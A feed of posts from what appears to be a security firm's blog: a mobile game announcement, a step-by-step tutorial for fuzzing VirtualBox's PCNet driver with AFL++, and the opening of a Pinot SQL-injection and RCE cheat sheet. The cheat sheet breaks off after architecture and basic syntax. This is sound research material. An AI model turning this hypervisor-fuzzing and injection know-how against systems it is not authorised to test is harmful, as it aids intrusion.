
H1.Jack, The Game

15 February 2022 at 23:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing our line of business - just having fun with computers!

We believe that the greatest lessons come from outside your comfort zone, so whether it’s a security audit or a new side hustle, we’re always challenging ourselves to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite having virtually zero experience in game design. We partnered with a small game studio that was just getting started, and we decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of our 2020 spare time working on the core mechanics and graphics. Unfortunately, limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite it all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play title with no advertisements. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame to gain new techniques and exploits. Heartbleed or Shellshock won’t be enough!

[Image: H1.Jack room]

While playing, you might end up talking to John or Luca.

[Image: Luca and John in H1.Jack]

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

Introduction to VirtualBox security research

25 April 2022 at 22:00

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As nested VT-x/AMD-V virtualization is not fully supported by VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation on an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.
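For reference, the three build directories used throughout this article are laid out as follows (matching the paths used in the commands below):

~/VirtualBox-6.1.30-debug/             # debug build, used for log-assisted exploration
~/VirtualBox-6.1.30-release-afl/       # instrumented release build, used for fuzzing
~/VirtualBox-6.1.30-release-afl-gcov/  # instrumented release build, used for coverage reporting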

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the VirtualBox binary will be created in the out/linux.amd64/debug/bin/ directory. Before creating our first guest machine, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, allowing us to selectively enable logging for specific files or functionalities. Unfortunately, since this logging is intended for debug builds, we could not enable it in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files, and specify the Log Group name using the lowercased string from the grep output, without the LOG_GROUP_ prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or differing comment styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL); otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and that more people were trying the same approach. The slides also mention VBoxHeadless, a natural choice for a harness, which we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside the VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards

Creating Coverage Reports

First, we have to apply the AFL patches described in the previous section. After that, we copy the instrumented version and remove any previously compiled binaries:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.
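As a minimal sketch (the profile file names are our own; vm-test is the VM name used earlier), collecting and summarizing the coverage could look like this:

$ LLVM_PROFILE_FILE="vbox-%p.profraw" out/linux.amd64/release/bin/VBoxHeadless -startvm vm-test
$ llvm-profdata merge -sparse vbox-*.profraw -o vbox.profdata
$ llvm-cov report out/linux.amd64/release/bin/VBoxDD.so -instr-profile=vbox.profdata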

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. The output below is truncated to the R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter are currently unused, but we can add our own functions and call them by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.

But first, if we want to use a modified VBoxHeadless, which provides a high-level interface (the VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM, so we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found that it is indeed possible to retrieve the VM handle via the IMachineDebugger class:

[Screenshot: the IMachineDebugger VM attribute]

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again to allow VBoxHeadless to access the internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);

        if (SUCCEEDED(hrc)) {

            PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
            PVM pVM = pUVM->pVM;

            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }

        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

3) In the same file, after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Finally, append __AFL_FUZZ_INIT(); before defining the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

to

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying user-controlled data, e.g. via I/O port access instructions or by reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in the references, which is probably the best available resource explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time we want to use only those values. Therefore, after some consideration while implementing our fuzzing framework, we discovered the FuzzedDataProvider (hereafter FDP).

FDP is part of LLVM and, after we pass it a buffer generated by AFL, it can use that buffer to generate a restricted set of numbers, bytes, or enums. We can store the pointer to the FDP inside the device driver instance and retrieve it any time we want to consume part of the buffer.
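To illustrate how FDP slices a single input buffer into typed, range-restricted values, here is a standalone sketch (independent of the VirtualBox build; the variable names mirror the harness below):

#include <fuzzer/FuzzedDataProvider.h>
#include <cstdint>
#include <cstddef>

/* Derive typed values from one AFL-generated buffer. */
static void consumeExample(const uint8_t *data, size_t size)
{
    FuzzedDataProvider fdp(data, size);
    uint16_t offPort = fdp.ConsumeIntegral<uint16_t>();     /* arbitrary 16-bit port offset */
    unsigned cb      = fdp.PickValueInArray({1u, 2u, 4u});  /* restricted to valid access widths */
    int      choice  = fdp.ConsumeIntegralInRange(0, 3);    /* selects which handler to call */
    (void)offPort; (void)cb; (void)choice;
}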

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using the convenient macro PDMDEVINS_2_DATA. Likewise, we can include the FDP header file and extend the state structure (in our case PCNETSTATE) with a pointer to the FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful to place them inside R3-only parts. The easiest way is to find the R3 constructor and add the new code just after it, as that section is already guarded by the IN_RING3 macro for conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even though we can reach more than 10k executions per second, we still have some work to do regarding stability.

Improving Stability

Unfortunately, none of the methods described here worked, as we were not able to use LTO instrumentation. We suspect that’s because the device drivers module is dynamically loaded, so partially disabling the instrumentation was not possible, nor was it possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or the VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when stability is low (the exact percentage depends on the drivers we fuzz). If we cannot reproduce a crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited
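The resulting core file can then be loaded into gdb together with the harness binary, e.g. (where the core file lands depends on the system’s core_pattern setting):

$ gdb out/linux.amd64/release/bin/VBoxHeadless core
(gdb) bt full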

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with a quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References

Apache Pinot SQLi and RCE Cheat Sheet

8 June 2022 at 22:00

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

  • data is being streamed in, and needs to be instantly queryable
  • many users need to perform complicated queries at the same time
  • the queries need to quickly aggregate or filter terabytes of data

Apache Pinot Overview

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via GRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via GRPC. The client receives the results consolidated into a single response.

Controller

The Controller maintains cluster metadata and manages the other components. It serves admin endpoints as well as endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.
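Condensed into commands, the quickstart boils down to something like this (a sketch; the release name and resource sizes are assumptions):

$ minikube start --memory=8g --cpus=4
$ helm install pinot ./kubernetes/helm/pinot -n pinot-quickstart --create-namespace
$ kubectl -n pinot-quickstart port-forward service/pinot-controller 9000:9000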

The only recommendations are to:

  • Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
  • Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the Github master branch.
  • Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

